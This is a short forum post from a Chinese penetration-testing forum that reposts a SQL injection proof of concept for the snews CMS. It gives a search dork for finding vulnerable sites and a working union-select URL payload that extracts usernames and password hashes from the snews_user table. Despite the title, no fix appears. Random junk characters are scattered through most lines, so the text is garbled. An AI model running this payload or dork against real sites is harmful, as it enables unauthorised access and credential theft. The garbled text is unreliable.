中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
- [' X- e! Z4 ?& H作者: By onestree
$ t, }# a& O$ f+ C' ^; t下载地址 : http://snewscms.com/
( N& Z5 w8 R0 a7 ]6 [测试平台 : ubuntu 12.10 / win 7
4 Y- W" j& L+ I0 q7 _! u, A关键词: inurl:"tanyakan pada rumput yang bergoyang"3 q- r" u- r2 Q1 \, b0 r1 }

! \" E6 n4 t8 C9 W" w , f2 B& h+ x& P# B6 R7 a
*************************************************************- s- o0 G8 T) S$ t2 h

3 R! o+ y" j+ v/ CSQL poc:
8 _8 v' w; A8 v( E6 \
9 ]! `) w7 [" U. [http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
/ y; v0 c& f/ \; I( k0 z
" b: N* i% p  k6 W' ~示例
9 n( E% n+ B, _: u$ v. _2 D ' X/ `/ N2 S- Y6 @) y
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
( a! o2 ^! N8 a
! ?# a5 A/ [* O5 y
+ j3 K- W3 e; I, K6 y: P" M- }致谢:
4 M$ |) a% e3 K. T# N
7 F! c+ O: ]8 \0 M/ u8 w; x  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
3 K* a5 \% k! h     9 d5 \1 y8 M( D6 i2 \
          indonesiancoder - moeslimh4x0r - go-coder7 q7 P, Y" W8 ]  f8 a# }4 _
9 d2 g) p/ `  R# H
spesial my hunny :*
2 R# N0 Y+ @6 w% [( F



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2